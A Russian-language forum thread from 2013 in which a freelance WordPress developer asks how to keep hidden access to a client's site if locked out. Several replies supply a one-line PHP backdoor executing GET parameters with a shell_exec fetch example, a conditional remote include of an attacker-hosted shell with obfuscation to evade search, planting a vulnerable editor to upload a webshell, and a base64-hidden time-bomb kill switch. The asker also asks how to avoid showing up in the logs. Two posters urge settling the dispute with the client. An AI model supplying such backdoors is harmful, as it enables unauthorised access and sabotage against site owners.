[Помогите] Полный доступ к сайту

Тема в разделе "Wordpress", создана пользователем Skorp1oN, 1 сен 2013.

Модераторы: Sorcus
  1. Skorp1oN

    Skorp1oN

    Регистр.:
    16 дек 2007
    Сообщения:
    368
    Симпатии:
    25
    Версия WP: 3.6

    Приветствую всех!
    Очень нужна ваша помощь!
    Столкнулся с неадекватным заказчиком... Делаю сайт на WP на хостинге заказчика. Чувствую что в любой момент можем разругаться (постоянно требует того что не было в ТЗ) и заказчик просто закроет доступ к сайту и сменит все пассы...

    Необходимо как-то сделать возможность попадать в админку сайта, или иметь полный доступ и к фтп и БД сайта, независимо от того какие будут стоять пароли на фтп, админку и бд.

    Залить бэкдор не вариант... Т.к. это как вирус и там админ сервака сразу удалит его и ситуация вообще станет хреновая...

    В общем, я уже не знаю что делать... Очень нужна помощь, возможно можно в какой-то файл залить какой-то скрипт... Не знаю(((( Очень нужна помощь.

    Заранее спасибо большое.
     
  2. enrik

    enrik Создатель

    Регистр.:
    5 июн 2013
    Сообщения:
    11
    Симпатии:
    4
    А если в любой .php файлик вписать $func($_GET[f]);, потом довольно просто будет или выполнить произволный php код или заинклудить shell.

    <?=($_=@$_GET[c]).stripslashes(@$_($_GET[f]))?>

    example:
    GET /news.php?c=shell_exec&f=fetch%20http://bitrix.metrolux******.ru/upload/to.php
     
    Skorp1oN нравится это.
  3. WiZXaK

    WiZXaK Причиняю добро

    Регистр.:
    8 сен 2012
    Сообщения:
    579
    Симпатии:
    797
    Простой вариант: Скрипт (поиск и замена) - можно пароль выставлять и переименовывать файл (замаскировать под системный). Сможешь менять код CMS или удалить все к :pop: на худой конец...
     
    Skorp1oN нравится это.
  4. pavzen

    pavzen Создатель

    Регистр.:
    29 авг 2013
    Сообщения:
    12
    Симпатии:
    2
    Поставьте любой редактор с обнаруженными уязвимостями (ну например TinyMCE).
    Через него сможете залить любой скрипт - хоть вебшелл.
     
  5. Skorp1oN

    Skorp1oN

    Регистр.:
    16 дек 2007
    Сообщения:
    368
    Симпатии:
    25
    Огонь вообще, то что надо) Спасибо огромное!
    Я так понял, он же не считается как вирус?
    А в логах потом будет видно что я заходил в этот файл? Ну если админ сервака посмотрит? Как не спалиться при редактировании?
     
  6. Шумадан

    Шумадан Хабарра!!11

    Регистр.:
    6 фев 2008
    Сообщения:
    1.723
    Симпатии:
    2.098
    у меня немного другой вопрос, если вы чувствуете, что заказчик неадекватен, то возможно лучше прекратить с заказчиком сотрудничество, чтоб избежать траты (на тот же шантаж типа вытру, удалю и так далее) времени в будущем, ведь если он не собирается (собирался) платить, он и не будет платить. может стоит провести черту, вот что было в тз сделано - пожалуйста оплатите. после оплаты пожалуйста сформируйте список изменениний. и так далее.

    суть такая, если вы потратили много времени, что делать изменения к изменениям лучше остановиться сейчас и потребовать оплату, ну хотя бы 50%, чтоб не жалко было отказаться в любой момент, а так заказчик вас будет водить за нос вечность.
     
    esche нравится это.
  7. enrik

    enrik Создатель

    Регистр.:
    5 июн 2013
    Сообщения:
    11
    Симпатии:
    4
    WiZXaK чтот палевный вариант :) в acces.log будет видно кто куда лазал... а доступ (при правильном выставлении прав) в /var/log у пользователя не будет... Это будет одноразовый пшик. И вообще всё это будет палиться в логах (любой вэб шелл).
     
  8. esche

    esche

    Регистр.:
    9 авг 2009
    Сообщения:
    360
    Симпатии:
    243
    Skorp1oN
    на мой взгляд есть смысл притормозить все работы и обговорить завершение этапа (Что нужно доделать для завершения текущего этапа.. т.е. до следующей оплаты? Что из этого выходит за рамки ТЗ? Пройтись по пунктам, определить объём работ и закончить его.)

    На будущее - (понятно, что пока своих шишек не набьешь..) есть смысл делать на своём сервере. Переносить только по результатам (естественно, если проект простой и времени на перенос уйдёт больше, чем стоит весь проект.. либо же доверие 100% /либо в других случаях по усмотрению/ можно делать на мощностях заказчика)

    Всё, что "нахулиганишь" своим шеллом/бэкдором/скриптом замены восстановится из бэкапов без особых проблем (почти уверен, что в случае запланированного "кидка" резервную рабочую копию текущих файлов заказчик сделает).

    По теме - можно includ-ить шелл (любой файл) по http (никаких eval или replace.. просто)
    Код:
    include 'http://myhost.ru/shell.txt';
    - сделать в зависимости от наличия какого-нибудь условия (isset($_GET['hhh']))
    - разбить http:// на части.. или использовать 16-ричные x00 символы (чтобы поиск по http:// ничего не дал)

    Все замены в файлах - штука сомнительная. Часто у веб-сервера (php-скрипта) просто не хватает прав на изменение файлов, созданных по FTP

     
    Шумадан нравится это.
  9. Skorp1oN

    Skorp1oN

    Регистр.:
    16 дек 2007
    Сообщения:
    368
    Симпатии:
    25
    Нет здесь другая ситуация... Заключалось СБР, но заказчик во время заключения сделки, вставил совсем другое ТЗ (точнее тоже самое, но уже с внесенными изменениями, которые он сам туда вставил и мы не обсуждали вообще их) т.е. очень схитрил. Ну я первый раз встречаюсь с такой наглостью... Причем о дополнительных работах, я уже узнал после того как сделал большую часть работы и дизайн (за дизайн уже со своего кармана заплатил дизайнеру). В общем, человек оказался очень хитрым и наглым. Так что отказываться или что-то поделать уже не вариант. Но помимо этого, он еще меня начал напрягать другими моментами... Типа куча лишнего дизайна для других страниц и т.п. он считает что в стоимость уже включены все дизайны которые он захочет... В общем, это в кратце..

    А какой тогда есть еще вариант, чтобы не спалиться? Подскажите пожалуйста.
     
    Последнее редактирование: 1 сен 2013
  10. Nei

    Nei Nosce te ipsum

    Регистр.:
    5 сен 2009
    Сообщения:
    599
    Симпатии:
    470
    Я иногда ставлю простейшую защита по дате: если текущая дата больше установленной - перкращать выполнение скрипта. И, соответсветнно, раз в неделю к примеру эту дату вручную изменять. Как только доступа к серверу нет и проходит неделя - сайт вырубается.
    Вставить этот код желательно в нескольких местах, где-то воткрытую, где-то в зашифрованном виде (base64 к примеру).

    Вычистить такие вставки в принципе не сложно для разбирающегося человека, но зачастую хватает и этого.

    P.S. Желаю все-таки по-человечески договориться с заказчиком и найти разумный компромисс.
     
    Шумадан нравится это.